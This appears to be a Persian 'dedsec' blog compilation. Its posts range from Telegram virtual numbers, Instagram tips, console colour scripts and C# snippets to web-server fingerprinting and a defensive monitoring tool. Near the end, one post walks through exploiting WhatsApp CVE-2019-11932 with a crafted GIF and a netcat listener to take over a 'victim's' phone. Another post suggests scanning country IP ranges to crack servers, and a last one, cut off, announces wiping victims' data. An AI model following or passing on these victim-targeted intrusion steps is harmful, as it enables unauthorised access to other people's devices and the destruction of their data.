بعد از دانلود و نصب تکست نو روی گوشیتون، بهتره روی Continue with Google بزنید تا یه حساب گوگل به شمارتون اختصاص بدین.

خب، حالا اگر حساب گوگلی دارید، انتخاب کنید، در غیر اینصورت یه حساب اضافه کنید، برای اضافه کردن حساب روی استفاده از حسابی دیگر بزنید و آدرس و رمز حساب گوگل را وارد کنید.

خب حالا، یه پیش شماره دلخواه بنویسید که تعریف شده باشه، این کد مشخص میکنه، شماره مجازیتون از چه کشوریه، که من 320 رو وارد کردم که مال آمریکاست.

خب حالا روی Continue بزنید و صبر کنید تا درخواست شما تایید بشه، سپس لیستی از شماره ها براتون به نمایش درمیاد که به دلخواه یه شماره رو انتخاب کنید و روی Continue بزنید.

شماره مجازی شما ساخته شد و حالا آماده استفاده است، حالا میتونید وارد تلگرام بشید و یه اکانت جدید ادد کنید و شماره مجازیتون رو بنویسید و کشور رو همون کشور شماره مجازیتون انتخاب کنید که من آمریکا رو انتخاب کردم.

خب حالا صبر کنید تا کد تایید از طریق برنامه تکست نو براتون ارسال بشه:

حالا وارد اکانتتون بشید و از اکانت جدیدتون لذت ببرید.

اینم از آموزش ساخت شماره مجازی، حالا هرچقد دوست دارید حساب گوگل ادد کنید و به طور رایگان برا خودتون شماره مجازی و اکانت درست کنین.

dedsec will give you the truth
join us


توی این پست کدهای تغییر رنگ هر خط توی خط فرمان رو قرار میدم

این پست رو به درخواست یه بنده خدایی نوشتم بخاطر همین زیاد توضیح نمیدم

کدهای پایین رو با پسوند bat یا cmd ذخیره و اجرا کنید.

@Echo Off
Title dedsec
Mode 50,20
Cls

For /F "tokens=1,2 delims=#" %%a in ('"prompt #$H#$E# & echo on & for %%b in (1) do rem ViRus32.Blog.IR"') do (
    set "DEL=%%a"
)

Call :RangMatn 0a "SABZ"
Echo. && Pause
Call :RangMatn 0C "GHERMEZ"
Echo. && Pause
Call :RangMatn 0E "ZARD"
Echo. && Pause
Call :RangMatn F "SEFID"
Echo. && Pause
Goto :eof
:RangMatn
echo off
<nul set /p ".=%DEL%" > "%~2"
findstr /v /a:%1 /R "^$" "%~2" nul
del "%~2" > nul 2>&1
Goto :eof

dedsec will give you the truth

join us


۱۰ نکته مفید برای افزایش فالوور اینستاگرام

با افزایش محبوبیت شبکه های اجتماعی و بخصوص اینستاگرام در این روز ها افراد زیادی به سمت این شبکه اجتماعی دوست داشتنی جذب شده اند. از این رو اینستاگرام افراد را بر این داشت تا در صفحه ی مجازی خود نوعی کسب درآمد را تجربه کنند. درآمدی که با تعداد فالوور های شما رابطه مستقیم دارد. اما در این مقاله راه های مختلف و آسانی را برای جذب مخاطب و افزایش فالوور اینستاگرام برای شما آماده کرده ایم. با ما همراه باشید.

اینستاگرام برنامه‌ای فعالیت محور

در برنامه اینستاگرام اگر یک قانون برای دیده شدن وجود داشته باشد، آن هم فعال بودن صفحه شما است از پست های تازه گرفته تا لایک و کامنت در صفحه های افراد مشهور. پس نکته اصلی موفقیت شما در این شبکه اجتماعی به میزان فعالیت شما بستگی دارد. اما چگونه یک صفحه فعال در اینستاگرام داشته باشیم ؟؟ با توجه به فعالیت محور بودن اینستاگرام قدم اول افزایش فعالیت شما در این راستا می باشد. این افزایش فعالیت با نکات زیر میسر می شوند.

نوع پیج اینستاگرام

در ابتدای کار شما باید هدف خود را مشخص کنید که آیا یک صفحه را برای فروش محصولات نیاز دارید یا یک صفحه برای انتشار عکس ها و فیلم های مورد نظر خود؟؟ با مشخص کردن هدف خود نوع پیج خود را با دقت انتخاب کنید زیرا در صورت انتخاب اشتباه، بعدها در فعالیت و دیده شدن صفحه شما تاثیر منفی خواهد داشت. در اینستاگرام دو نوع صفحه وجود دارد:

  1. صفحه شخصی افراد
  2. صفحه تجاری یا business

در صفحه های شخصی افراد تنها قابلیت پست گذاری و مشاهده صفحه های دیگران را دارند اما در صفحه های تجاری شما میتوانید علاوه بر پست گذاشتن به معرفی محصول خود و نیز درج قیمت آنلاین آن بپردازید. این قابلیت به شما این امکان را میدهد تا در صورتی که به اینترنت درسترسی ندارید افراد با مشاهده قیمت آن نسبت به انتخاب و سفارش آن محصول اقدام کنند و مانند صفحه های شخصی نیازی به مراجعه به دایرکت برای پرسیدن قیمت نمی باشد. همین امر کاهش زمان پاسخ و سفارش یک محصول برای شما و خریدار می شود که یک مزیت بسیار خوبی  می باشد .

بیوگرافی مناسب

در اینستاگرام قابلیتی به عنوان بیوگرافی برای هر دو نوع صفحه شخصی و تجاری وجود دارد که با این قابلیت قارد هستید تا یک بند برای معرفی یا هدف تجارت خود توضیح دهید. همین یک بند اگر با دقت و مفید نوشته شود تاثیر بسیار زیادی در جذب مخاطب خواهد داشت. پس در نوشتن یک بیوگرافی مناسب عجله نکنید و مفیدترین توضیحات را درباره خود یا تجارت خود بنویسید. بیوگرافی همانند الماسی درخشان صفحه شما را زیبا می کند یا بالعکس باعث عدم جذب مخاطب برای شما خواهد شد.

پست گذاری

مساله اصلی در هر پیج پست گذاری مرتب با عکس های مناسب و با کیفیت می باشد. عکس های انتخابی باید به گونه‌ای باشند که تمام جزییات را در خود نمایش دهند اگر از نور کافی برخوردار بوده و دارای افکت مناسب باشند.

پس از انتخاب عکس مناسب شما میبایست یک یا چند جمله در زیر آن به عنوان کپشن عکس خود بنویسید. نوشتن یک کپشن مناسب برای معرفی محصول در جذب مشتری تاثیر بسزایی دارد. اگر عکس خود را عکسی یادگاری پست می کنید کپشن مناسب می تواند در ادراک مخاطب از عکس کمک کند تا آن حسی که شما هنگام عکس گرفتن دارید به مخاطب منتقل کنید. درک احساس مرتبط در جذب مخاطب یک عامل مثبت می باشد برای مثال یک عکس شاد با کپشن مناسب می تواند در حال یک فرد غمگین تاثیر گذاشته و باعث شادی او و جذب همان فرد به عنوان دنبال کننده شما شود.

زمان

زمان پست گذاری مساله ی مهم دیگری در دیده شدن پست های شما می باشد. با دانستن زمان پر مخاطب در منطقه خود می توانید یک قدم مثبت در دیده شدن بیشتر بردارید برعکس همین قضیه نیز برای شما صادق است. برای مثال در افراد جامعه بعد از نیمه شب در اینستاگرام فعالیت نمی کنند و در خواب شبانگاهی خود هستند بالطبع پست گذاری بعد از نیمه شب امکان دیده شدن آنرا تا حد زیادی میکاهد اما در صورتی که در وقت مناسب مانند عصر پست خود را منتشر خود به دلیل انلاین بودن افراد بیشتر در اینستاگرام تا حد زیادی به دیده شدن حداکثری خود پست خود کمک کرده اید.

هشتگ #

علامت شارپ یا به اصطلاح امروزی هشتگ در هر پست به دیده شدن آن پست کمک می کند. نوشتن کلمات کلیدی در وصف عکس یا فیلم با هشتگ مناسب در پستی که انتشار می کنید میتواند در صدر دسته بندی آن موضوع قرار بگیرد و با جستجوی افراد پست شما بالاتر از همه نشان داده شود همین امر در جذب مخاطب تاثیر مثبتی دارد. حال اگر از هشتگ های مناسب استفاده نکنید هنگام جستجو پست های شما نشان داده نمی شود.

تگ و منشن کردن

شما میتوانید در اشتراک گذاری عکس خود از قابلیت تگ استفاده کنید بدین معنی که اگر عکسی دسته جمعی یا محصول با برند خاص به نمایش میگذارید ایدی آن فرد را نیز در عکس تگ کنید بدین تربیت افراد تگ شده عکس شما را میبینند و در صفحه آنها نیز در قسمت بخصوصی پست شما دیده میشود. همچنین افراد یا برند های دیگر نیز با تگ کردن ایدی شما در صفحه خود باعث بهتر دیده شدن پیج شما میشود.

منشن کردن نیز در قسمت کپشن پست قابل استفاده است برای مثال عکسی در توصیف یک مساله خاص پست میکنید شما میتوانید افراد یا ایدی پیج های دیگر را منشن کرده تا آنها نیز از پست شما با خبر شوند.

لایک و کامنت

گفتیم که تنها قانون اینستاگرام فعالیت مناسب در آن است شما برای دیده شدن راه های مختلفی دارید اما ساده ترین آنها لایک کردن پست های مشهور در دنیا میباشد همچنین با کامنت کذاشتن در پست ها شما خود را میتوانید معرفی کنید. توجه داشته باشید که کامنت های تکراری و زیاد در یک پست باعث مسدودیت دسترسی شما به قسمت کامنت به مدت محدود میشود پس استفاده از کلمات مناسب و مودبانه نظر خود را بنویسید تا باز خورد نظر شما مثبت واقع شود. اگر هم در قسمت کامنت به تبلیغ محصولات میپردازید باز توجه داشته باشید کامنت های تکراری مسدود میشوند پس از فرصت استفاده کرده و هر بار یک تبلیغ از یک محصول متفاوت ارایه دهید تا هم متنوع محصولات خود را نشان دهید و هم مسدود نشوید.

تیک آبی

تیک آبی نشانی است که برنامه اینستاگرام برای احزار هویت کاربران مهم اعتا میکند با داشتن این نشان بعضی محدودیت هایی که برای افراد معمول هست رفع میشود برای مثال با داشتن این تیک ابی شما میتوانید هر روز و هر ساعت به تعداد دلخواه فالو کنید یا تعداد فالور های شما افزایش یابد در واقع افزایش ناگهانی فالور در اینستاگرام مشکوک می باشد و اگر در یک زمان مشخص تعداد نسبتا زیادی فالوور جذب کنید امکان مسدود شدن پیج شما وجود دارد زیرا برنامه برای حفظ امنیت از ربات ها این محدودیت را اعمال کرده است . نکته دوم در تیک آبی به رسمیت شناخته شدن صفحه شما می باشد یعنی اگر فرد مشهوری هستید افراد با جستجوی نام شما به راحتی صفحه شما را پیدا کرده و شما را دنبال می کنند تیک آبی همانند برگ برنده در بازی می باشد . شما می توانید این تیک ابی را در تنظیمات بعد از ارسال درخواست خود به اینستاگرام و احراز هویت دریافت کنید.

انتخاب آیدی مناسب

شما پس از ثبت نام و ایجاد صفحه شخصی در اینستاگرام می بایست یک شناسه (آیدی) مناسب برای صفحه خود انتخاب کنید. شما با این شناسه دیده میشوید و افراد هنگام جستجو از این شناسه استفاده میکنند پس با انتخاب یک شناسه مناسب با اندازه مناسب که مرتبط با فعالیت شما در پیج خود است میتوانید مخاطبین بیشتری جذب کنید . انتخاب شناسه مناسب باعث حفظ آسان آن میشود که افراد در جستجو های بعدی براحتی شما را پیدا میکنند و همچنین میتواند یک شناسه خوب و جذاب شما را به سر زبان ها بیاورد.

نوع پروفایل

در اینستاگرا برای خفظ حریم خصوصی افراد دو نوع تنظیم برای پیج ها وجود دارد:

  1. اکانت خصوصی یا قفل دار (private)
  2. اکانت عمومی یا پابلیک (public)

اگر تنظیمات شما در حالت خصوصی باشد فقط افراد دنبال کننده ی شما قادر به دیدن پست‌ها و استوری های شما خواهند بود و اگر شخصی بخواهد شما را دنبال کند ابتدا می بایست بک درخواست باصطلاح (Follow request) به شما ارسال کند تا در صورت صلاح شما بتواند شما را دنبال کند. اما در حالت عمومی تمامی پست ها و استوری های شما قابل مشاهده می باشد و افراد بدون محدودیت شما را دنبال میکنند.

توجه داشته باشید توضیحات بالا فقط برای صفحه های عمومی کاربرد خواهد داشت در غیر اینصورت شما نمی توانید به سرعت صفحه خود را پر بازدید کنید.

کلام آخر: همه چیز بستگی به اراده و تلاش شما در این راستا دارد پس ناامید نشده و با قدرت ادامه دهید. امیدوارم توضیحات ما برای شما مفید واقع شده باشد.

dedsec will give you the truth

join us


اشنایی و تشخیص وب سرور

کار وب سرور ها در واقع نمایش وب سایت به کاربران با ارسال درخواست ان ها اشت و و تمامی صفحات سایت را برای نمایش به کاربر اماده می کنند. برای نمایش هر وب سایت در مرورگر کاربر ،نیاز به یک وب سرور است. وب سرور ها انواع مختلفی دارند که هر وب سایت با توجه به نیاز خود از ان ها استفاده می کند برای مثال ما در ادامه اموزش مهم ترین ان ها را معرفی می کنیم تا با ان ها اشنا شوید و بتوانید با جمع اوری اطلاعات از ان ها تست نفوذ خود را اگاهانه و دقیق انجام دهید.

برخی از وب سرور های معروف

  • apache
  • litespeed
  • nginx
  • iis

تشخیص وب سرور

یکی از ساده ترین روش های مشخص کردن وب سرور استفاده از افزونه مرورگر ها است مانند wappalyzer که در هنگام ورود به هر سایت می توانید برخی از اطلاعات ان را مشاهده کنید که وب سرور هم یکی از ان ها است درواقع با این ابزار ساده می توانید وب سرور را مشخص کنید اما در بعضی موارد ممکن است اطلاعات اشنباه نمایش دهد.

سایت های انلاین

وب سایت هایی هستند که Webserver وب سایت را برای شما مشخص می کنند.

برای مثال می توانید وارد سایت زیر شوید که کار این وب سایت گرفتن هویز است اما در کنار ان می توانید اطلاعات دیگری هم مانند وب سرور ر مشاهده کنید کافیست در بخش جستجو ان ادرس سایت را وارد کنید و در قسمت Server Type نوع وب سرور را مشاهده کنید.

  اموزش HTML مقدماتی تا پیشرفته قسمت 1

https://whois.domaintools.com/

وب سایت پیشنهادی برای تشخیص وب سرور

وب سایت زیر اطلاعات کاملی فقط از وب سرور سایت مورد نظر شما نمایش می دهد.

https://browserspy.dk/webserver.php

د این وب سایت علاوه بر مشخص کردن نوع وب سرور اطلاعاتی از امکانات ان هم به ما می دهد که به طور کلی یک ابزار کامل برای انالیز وب سرور به صورت انلاین است.

تست نفوذ با وب سرور ها

بعد از شناسایی وب سرور و تشخیص ورژن های ان می توانید یک جستجو برای پیدا کردن اسیب پذیری از ان پیدا کنید و سپس تست نفوذ خود را برای گرفتن دسترسی انجام دهید. دقت داشته باشید در مواردی ممکن است اطلاعات به صورت فیک و جعلی باشد که فقط نفوذگر گمراه شود.

dedsec will give you the truth

join us


آشنایی با رنج آی پی کشور ها

هر کشور برای خود رنج ای پی خاصی را اختصاص داده است که هر کدام از ان ها برای موارد خاصی استفاده می شوند. برای مثال برخی به دولت ها و سازمان ها تعلق میگیرد و برخی دیگر برای ارائه به مردم کشور و شهر های مختلف ان، به همین دلیل رنج ای پی ها مشخص کننده بسیاری از این موارد مهم هستند و باید با ان ها اشنا بود که در ادامه به کاربرد های ان در هک و امنیت می پردازیم.

کاربرد داشتن رنج های ای پی کشور ها در تست نفوذ

کرک سرور مجازی

بسیاری برای کرک سرور مجازی اقدام به اسکن رنج ای پی های خاصی را که محل مورد نظر ان ها است می کنند که در واقع رنج ای پی ها می توانند برای رسیدن به نتایج بهتر و هدفمندتر کمک زیادی کنند

شناسایی کشور و شهر

در صورتی که بخواهید از یک کاربر یا یک سرور جمع اوری اطلاعات کنید و ای پی ان را داشته باشید

به راحتی با داشتن رنج ای پی های ان می توانید شهر و کشور مربوط به ان را پیدا کنید.

پیدا کردن سرویس دهنده

سرویس هایی که از رنج بخصوصی برای خود استفاده می کنند

با پیدا کردن سرویس دهنده ان ها از طریق رنج ای پی ان قابل شناسایی هستند.

تست نفوذ

برای مثال اگر قصد تست یک اسیب پذیری در سرویس های یک کشور خاصی را داشته باشید

فقط با استفاده از رنج ای پی های ان کشور این کار عملی خواهد بود.

معرفی وب سایت های ارائه دهنده رنج های ای پی

وب سایت ip2location

این وب سایت تمامی ای پی های دنیا و رنج های ان ها را در خود جای داده است و برای استفاده از ان هم محیط گرافیکی ساده و اسانی دارد، اطلاعاتی که می توانید از ان بگیرید فقط رنج ip ها و در نهایت مجموع تعداد ای پی های اختصاص یافته است که نمایش می دهد. با ورود به وب سایت زیر کافیست کشور مورد نظر خود را انتخاب کنید تا لیست تمامی ای پی های ان را مشاهده نمایید.

https://lite.ip2location.com/ip-address-ranges-by-country

سایت nirsoft

این وب سایت علاوه بر امکانات سایت قبلی امکانات اضافه تری هم دارد که می توانند برای شما بسیار کاربردی باشند؛ برای مثال میتوانید حتی isp ها های رنج ای پی را مشاهده کنید که این اطلاعات نسبتا بروز و دقیق هستند. نکته جالبی هم که دارد این است که حتی تاریخی که ای پی ها به isp و کشور اختصاص یافته است را می توانید مشاهده نمایید.

https://www.nirsoft.net/countryip/

dedsec will give you the truth

join us


کاربرد پایتون در هک و امنیت

زبان برنامه نویسی در هک و امنیت چقدر اهمیت دارد ؟

بسیاری از افرادی که می خواهند وارد دنیای هک و امنیت شوند این سوال را در ذهن خود دارند :

  • بهترین زبان برنامه نویسی برای هک چیست ؟
  • یا ایا اصلا زبان برنامه نویسی برای هک و امنیت نیاز است؟
  • کدام زبان بهتر از دیگری است ؟
  • ایا پایتون زبان خوبی برای هک و امنیت است؟
  • ….

همانطور که در هر کاری سطح کاری می تواند متفاوت باشد در حوزه تست نفوذ و امنیت هم سطح کاری متفاوت است، یعنی هر شخص با توجه به دانش و نیاز خود می تواند در سطح های مختلفی قرار بگیرد که در سطح اولیه یادگیری نیازی به زبان برنامه نویسی نیست اما برای بالا بردن سطح علمی و عمیق تر شدن در این حوزه باید حداقل یک زبان برنامه نویسی را نسبت به علاقه خود یاد بگیرید.

برای مثال اگر علاقه متد به تست نفوذ سیستم عامل های ویندوزی هستید بهتر است به سراغ زبان های .net مانند C# بروید که برای مثال بتوانید ابزار هایی مانند رات ها کیلاگر ها و …. برای خود بنویسید و با اسیب پذیری های درون برنامه های نوشته شده با این زبان اشنا شوید.

زبان های دیگری هم مانند php و asp هم می توانند در زمینه های وب و درک اسیب پذیری های ان ها کمک شایانی کنند و حتی با این زبان ها اکسپلویت نویسی انجام دهید. پس به طور کلی زبان برنامه نویسی خاصی برای هک و امنیت مطرح نیست و شما باید طبق علاقه خود یک زبان را انتخاب کنید.

  10 وبسایت برتر برای هکرها و برنامه نویسان

پایتون | Python

این زبان برنامه نویسی نسبت به دیگر زبان ها بسیار ساده بوده و امکانات فوق العاده ای را در کتابخانه های خود جای داده است. برای مثال اگر یک برنامه با زبان c++ با 1000 خط نوشته شود با استفاده از زبان پایتون شاید با 500 خط انجام شود، به همین خاطر بسیاری در زمینه تست نفوذ به سراغ این زبان برنامه نویسی می روند.

آشنایی با کاربرد پایتون در هک و امنیت

اکسپلویت نویسی یکی از مراحل بسیار تخصصی و حرفه ای در هک و امنیت است که بسیاری با پیدا کردن اسیب پذیری اکسپلویت ان را به صورت یک برنامه با زبان پایتون می سازند تا عملکرد اکسپلویت به صورت دقیق و صحیح انجام شود. برخی از دیگر اکسپلویت ها فقط در قالب یک برنامه نوشته شده قابل استفاده هستند پس با درک این موضوع به یک زبان برنامه نویسی نیاز است که هم امکانات کاملی داشته باشد و هم در سریع ترین زمان ممکن به صورت ساده قابل استفاده باشد.

برخی از کاربرد های پایتون

  • ساخت ابزار های امنیتی تحت کنسول
  • ساخت اپلیکیشن های الوده و رات جهت تست نفوذ
  • امکان ساخت اکسپلویت های حرفه ای
  • امکان اجرای پایتون در انواع سیستم عامل ها
  • ….

نتیجه گیری

برای شروع و یادگیری مباحث تست نفوذ و امنیت به صورت تخصصی زبان برنامه نویسی می تواند بسیار کاربردی و مهم باشد و حتما برای انتخاب یک زبان باید به حوزه مورد علاقه خود توجه کنید و از روی شنیده ها که کدام زبان بهتر است عمل نکنید چرا که همه زبان ها به دلیل ان که نیاز بوده اند ساخته شده اند و هر کدام مزایا و معایب خود را دارند که برای مثال کاربرد های پایتون را در هک و امنیت مثال زده ایم و به صورت کامل توضیح داده شد.

dedsec will give you the truth

join us


در پروژه های حسابداری لازمه که اعداد برای خوانایی بهتر سه رقم سه رقم از هم تفکیک بشن
برای این کار میتونیم از تکه کد زیر استفاده کنیم:
if (textBox1.Text != string.Empty)
{
textBox1.Text = string.Format("{0:N0}", double.Parse(textBox1.Text.Replace(",", "")));
textBox1.Select(textBox1.TextLength, 0);
}
این کد رو باید در رویداد  TextChanged قرار بدیم
البته برای جلوگیری از کثیف شدن کدنویسیمون هم میتونیم یه متد تعریف کنیم و برای هر تکست باکسی ازش استفاده کنیم
private void dedsec(object sender)
{
TextBox tb = (TextBox)sender ;
if (tb.Text != string.Empty)
{
tb.Text = string.Format("{0:N0}", double.Parse(tb.Text.Replace(",", "")));
tb.Select(tb.TextLength, 0);
}
}
برای تعریفش هم در رویداد TextChanged به شکل زیر ازش استفاده میکنیم
dedsec(sender);
و یا میتونیم این کد رو تو یه فرم کلاس جداگانه بنویسیم و تو کل پروژه ازش استفاده کنیم
public TextBox sender { get; set; }
internal void dedsec(object sender)
{
TextBox tb = (TextBox)sender;
if (tb.Text != string.Empty)
{
tb.Text = string.Format("{0:N0}", double.Parse(tb.Text.Replace(",", "")));
tb.Select(tb.TextLength, 0);
}
}
برای تعریفش هم در رویداد TextChanged به شکل زیر فراخوانیش میکنیم
cd.dedsec(sender);
البته ابتدا باید فرم کلاس هم تعریف شده باشه.
formname cd = new formname();
dedsec will give you the truth
join us

تشخیص حملات و مانیتورینگ ویندوز

اگر از کاربران ویندوزی هستنید باید برای امنیت خود همیشه سیستم خود را با مانیتورینگ دائم تحت کنترل نگه دارید تا امنیت شما حفظ شود؛ برای موضوع انتی ویروس ها و فایروال ها می توانند تا حدی زیادی به ما کمک کنند و انواع حمله های انجام شده یا در حال انجام را به ما هشدار دهند اما همیشه نمی توانند با دقت کامل همه این حملات را تشخیص دهند و به صورت تخصصی تر اطلاعات را به ما نمی دهند به همین خاطر باید از ابزار های دیگری هم برای بالا بردن امنیت استفاده کنید ما در این اموزش می خواهیم ابزار Attack Monitor معرفی کنیم و در ادامه با نحوه کارکرد و امکانات ان اشنا شویم.

معرفی ابزار Attack Monitor

همانطور که گفته شد با استفاده از این ابزار میتوانید انواع حملات را مانیتورینگ کنید. این ابزا ربه زبان پایتون نسخه 3 نوشته شده است و از نسخه های ویندوز 7 ، 8 ، 10 و ویندوز سرور های 2008 ، 2012 ، 2016 ، 2019 پشتیبانی می کند و به طور کلی می توانید با این ابزار از حملات سایبری در سیستم خود جلوگیری نمایید.



نحوه نصب و استفاده از ابزار برای مانیتورینگ و تشخیص حملات

در ابتدا کار پایتون نسخه 3 را در ویندوز خود دانلود ونصب نمایید.

سپس از لینک گیت هاب قرار داده شده در اخر اموزش تمامی فایل های ابزار را دانلود کنید.

  هکر ها خانه های هوشمند را جاسوسی میکنند

وارد CMD ویندوز شوید و دستورات زیر را به ترتیب برای نصب پیشنیاز های ابزار وارد نمایید :

(دقت داشته باشید از طریق CMD وارد مسیر پوشه ابزار شده باشید.) تشخیص حملات

pip3 install -U -r requirements.txt

python installer.py sysmon

python installer.py psaudit

python installer.py auditpol

حال که پیشنیاز ها را نصب کرده اید با دستورات زیر خود ابزار را برای تشخیص حملات و مانیتورینگ نصب و اجرا نمایید :

python installer.py install

python installer.py exceptions

بعد از انجام دستورات بالا پنجره CMD را مانند تصویر زیر باز نگه دارید مشاهده خواهید کرد که بعد از هر حمله در ویندوز شما از طریق نوتیفیکیشن ویندوز به شما اطلاع رسانی خواهد شد. این ابزار امکانات دیگری هم مانند انالیز بد افزار ها دارد که میتوانید از ان ها هم استفاده نمایید اما بهترین عملکرد ان در زمینه مانیتورینگ و تشخیص حملات است.

نحوه کار ابزار Attack Monitor
نحوه کار ابزار Attack Monitor

لینک دانلود


dedsec will give you the truth
join us

توی این پست بررسی میکنیم که چطور میشه تشخیص داد یه کاربر برای اولین بار از سایت ما بازدید کرده

و اگر برای اولین بار بازدید کرده بود چیکار کنیم که یکسری اتفاقات بیفته.

برای اینکار روش های مختلفی موجوده

مثلا استفاده از کوکی ها یا جی کوئری یا حافظه داخلی مرورگر و غیره

توی این پست به نحوه ی انجام اینکار به کمک حافظه ی داخلی مرورگر میپردازیم

برای اینکار یه فایل Html ایجاد کنین و کدهای پایین رو داخلش قرار بدین

<html>
    <head>
        <title>dedsec</title>
    </head>
    <script type="text/javascript">
     var firstTime = localStorage.getItem("ded");
        if(!firstTime) {
            window.open("http://www.dedsec-hack.blog.ir","","toolbar=no, width=400,height=300,directories=no,menubar=no,scrollbars=no");
            localStorage.setItem("ded","1");
       }
    </script>
<body>
    dedsec
</body>
</html>

اگر قسمت مهم کدها یعنی قسمت javascript کدهارو نگاه کنید

متوجه میشین که هدف من کار کردن با صفحات پاپ آپ هستش و اگر یه کاربر برای اولین بار وارد سایت من بشه وبلاگ dedsec براش باز میشه و اینکار توی دفعات بعدی اتفاق نمیفته ( بعد از اجرا یکبار صفحه رو بروزرسانی کنید )

شاید دلتون بخواد این مقدار رو از حافظه ی مرورگرتون پاک کنید تا مجددا بتونید چک کنید ببینید کدها واقعا درست کار میکنه یا نه که برای اینکار میتونین داخل صفحه کلیک راست کنید و روی گزینه Inspect Element بزنین و بعدش وارد قسمت Console بشین و کد پایین رو داخلش بنویسید و اینتر کنید

اونموقع بعد از بروزرسانی صفحه میبینید که مجددا وبلاگ dedsec براتون بالا میاد

window.localStorage.removeItem('ded');

موفق باشید

dedsec will give you the truth

join us


سورپرایز آذری جهرمی اعلام شد!

ساعاتی پیش در اکانت اینستاگرام اقای وزیر جوان پیام زیر به عنوان سورپرایز منتشر شد.

سورپرایز آذری جهرمی اعلام شد!
سورپرایز آذری جهرمی اعلام شد!

"ما به جای صحبت و جلسه، چند اقدام عملیاتی انجام دادیم که واقعا هزینه‌ها کمتر بشه و از آلودگی شهرها جلوگیری کنیم. برای همین در طرح پست+:
انتقال بسته‌های پستی با پهپاد را فراهم کردیم که دیگر در هیچ جای ایران نقطه‌ای باقی نماند که غیرقابل دسترس باشد. انتقال سریع دارو به بیمارستان‌ها، جزیره‌ها، سورپرایز کردن یکدیگر و… از جمله کارهایی است که از این به بعد در اختیار شما خواهد بود. در حال حاضر کشورهای کمی در دنیا هستند که این کار را کرده‌اند. ما می‌توانیم! خدا قوت به همه‌ی جوانان ایرانی برای این دستاورد!
تجهیز کردن شرکت ملی پست به ماشین برقی، موتور برقی و دوچرخه برقی کاملا ایرانی

همچنین به مناسب آغاز پست+، ارسال نامه در سراسر کشور از طریق پست در شنبه ۲۳ آذر رایگان خواهد بود.
لطفا برای اطلاع بیشتر به سایت post-plus.ir مراجعه فرمایید.
——–
در مورد این موج سورپرایز باید خدمتتون بگم که خیلی‌ از کامنت‌ها و توییت‌ها و استوری‌ها و پیامک‌ها رو خوندم. واقعا خلاقیت شما مردم عزیز و اعتماد و لطفی که به بنده به عنوان خادم خود دارید یک دنیا ممنونم.
اتفافا خیلی از این سورپرایزها مثل ارسال ماهواره جدید، ارزان کردن اینترنت، #پایان_وس و … رو در تقویم گذاشتم و در دو هفته آینده از این دستاوردها و خدمات زیاد خواهیم دید
امیدوارم تلاش‌هایم برای رفع فیلترها هم به نتیجه برسه ، خیلی از توییت‌ها و کامنت‌ها رو برای بقیه در جلسات می‌خونم تا بالاخره با واقعیت‌های جامعه و خواسته‌های شما آشنا شوند.

بالاخره ممکنه #خبر_خوب زیادی در این مدت نشنویم یا حتی از شنیدن سورپرایز تعجب کنیم. اما من تمام تلاشم رو می‌کنم که حداقل به اندازه‌ی خودم برای شما مردم کار کنم و خبر خوب بدهم. همین شادی و هیجانی که این مدت در جامعه ایجاد شد خیلی ارزشمنده. کشور و مردم بزرگی داریم و باید قدرشون رو بدونیم. باید ایران رو بهترین و پیشرفته‌ترین کشور دنیا کنیم!

دوستتون دارم.
ارادتمند شما مردم بزرگوار،
محمدجواد."

dedsec will give you the truth

join us


سلام خدمت تمامی کاربران عزیز وبسایت تیم امنیتی dedsec

 

در مطالب گذشته راجب هک کردن گوشی اندروید صحبت کردیم ، اما روش هایی که گفتیم بیشترش استفاده از فایل مخرب APK بود و خیلی از دوستان سوال پرسیدن بودن آیا روش های دیگری هم برای هک کردن گوشی اندروید وجود داره؟ قطعا وجود داره ولی اگر شما بخواهید حملات حرفه ای تری رو انجام بدید نیازمند دانش بالایی در این زمینه هستید ، یکی از روش هایی که خیلی برای نفوذ به گوشی اندروید ازش استفاده میشه فایل مخرب APK هست اما به دلیل استفاده خیلی زیاد از این روش کاربران نسبت به این حمله مقاوم شده اند و به راحتی نمیتونید فایل مخرب APK خودتون رو به قربانی بدید و اون به راحتی نصب کنه ، پس ما باید روش نفوذمون رو تغییر بدیم ، یکی از راه ها استفاده از آسیب پذیری هایی هست که برای سیستم عامل اندروید منتشر میشه  ، آسیب پذیری StageFright این اجازه رو به ما میداد تا از طریق فایل MP4 به گوشی اون شخص نفوذ کنیم که تو زمان خودش بی نظیر بود ، شاید خیلی ها بگن عجب روشی بوده که باید بگم روش خوبی بود ولی از اون بهترش هم هست پس با ما همراه باشید تا از طریق فایل gif و فرستادنش از طریق واتس اپ برای قربانی به گوشیش دسترسی بگیریم.

  

توضیحی راجب آسیب پذیری واتس اپ (Whats App) :

آسیب پذیری به وجود آمده در واتس با شناسه CVE-2019-11932 دردسترس هست ، این آسیب پذیری از نوع double free vulnerability است که به ما امکان اجرا دستور دلخواه برروی سیستم عامل اندروید رو میده که ما با ارسال یک فایل gif در واتس اپ و اجرای اون توسط قربانی ما میتونیم به گوشی قربانی دسترسی بگیریم. این آسیب پذیری برروی نسخه واتس اپ ۲٫۱۹٫۲۴۴ به پایین کار میکنه و برروی نسخه های بالاتر این آسیب پذیری رفع شده است.

 

 

خب خیلی حرف زدم بهتره بریم سراغ کارمون در اولین قدم من با دستور زیر اکسپلویت این آسیبپ پذیری رو دانلود میکنم

 

 

 

بعد از دانلود اکسپلویت وارد پوشه اکسپلویت میشیم و دستور make رو وارد میکنیم تا فایل های مورد نیاز ما رو کامپایل کنه که البته شما  با دستور زیر هم میتونید اینکار رو انجام بدید

 

 

gcc -o exploit egif_lib.c exploit.c

 

 

در این مرحله ما نیاز به یه فایل gif داریم که به دلخواه یک فایل gif رو انتخاب میکنیم که قراره این فایل gif رو به اکسپلویت بدیم تا تغییرات رو انجام بده و آماده استفاده بشه ، من از قبل یه فایل gif رو از اینترنت دانلود کردم و با دستور زیر فایل gif رو به اکسپلویت معرفی میکنم

 

 

 

خب الان فایل gif ما آمادست با دستور زیر ما ابزار NC رو روی حالت Listener میبریم تا بعد از اجرای gif توسط قربانی دسترسی ما به گوشی برقرار بشه

 

 

 

کافیه فایل gif خودمون رو از طریق واتس اپ برای قربانی ارسال کنیم

 

 

 

خب بعد از ارسال فایل gif منتظر میمونیم قربانی فایل gif رو اجرا کنه و بعد از اجرا دسترسی ما به گوشی برقرار میشه

 

 dedsec will give you the truth

join us

 


با سلام خدمت همگی دوستان 

توی این آموزش قراره راجب از بین بردن اطلاعات سیستم قربانی و به هنگ انداختن سیستم قربانی صحبت کنیم

ویروسای مخرب همیشه از تکه کدهای ساده و کاربردی ایجاد میشن

